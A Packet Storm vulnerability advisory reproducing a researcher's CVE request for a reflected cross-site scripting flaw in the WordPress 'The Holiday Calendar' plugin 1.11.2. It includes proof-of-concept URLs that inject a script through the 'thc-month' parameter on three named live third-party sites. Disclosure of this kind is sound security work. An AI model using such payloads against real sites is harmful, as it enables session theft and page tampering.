what you don't know can hurt you

WordPress The Holiday Calendar 1.11.2 XSS

WordPress The Holiday Calendar 1.11.2 XSS
Posted Jul 30, 2015
Authored by Luciano Pedreira

WordPress The Holiday Calendar plugin version 1.11.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 37d0589b67aa1830ee060ab4a61a04d9

WordPress The Holiday Calendar 1.11.2 XSS

Change Mirror Download
---------- Forwarded message ----------
From: Luciano Pedreira <lpedreira@gmail.com>
Date: 2015-07-20 10:06 GMT-03:00
Subject: CVE_for_Vulnerability_theholidaycalendar
To: cve-assign@mitre.org


Dear,

In a recent research conducted in the "The Holiday Calendar" plugin (
http://www.theholidaycalendar.com /
https://wordpress.org/plugins/the-holiday-calendar) I found vulnerability
related at Cross Site Scripting.


. The Holiday Calendar plugin Cross Site Scripting Issues


This problem was confirmed in the following versions of the "The Holiday
Calendar", other prior versions maybe also affected.

Version: 1.11.2
(Tested with Mozilla Firefox Browser)


DETAILS

The "The Holiday Calendar" plugin (http://www.theholidaycalendar.com /
https://wordpress.org/plugins/the-holiday-calendar) is affected by Cross
Site Scripting. The variable "thc-month" do not sanitize input data,
allowing attacker to store malicious javascript code in a page.


Proof of Concept to exploit the vulnerability:

http://dimensaonet.com.br/blog/eco-dimensao-workshop-inscricao/?thc-month=201504%27%22%3E%3Cscript%3Eprompt%2899%29%3C/script%3E

http://sabreschool.com/?post_type=thc-events&date=2015-04-04&country=GB&thc-month=201504%27%22%3E%3Cscript%3Eprompt%2899%29%3C/script%3E

http://zehaschmidtke.de/wp/events/?date=2015-05-25&dateFormat=2&country=DE&readmore=1&thc-month=201504%27%22%3E%3Cscript%3Eprompt%2899%29%3C/script%3E


CREDITS

This vulnerability was discovered and researched by Luciano Pedreira
(a.k.a. shark)


I wonder how to create a CVE for this publication?


best regards,

Luciano Pedreira


Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close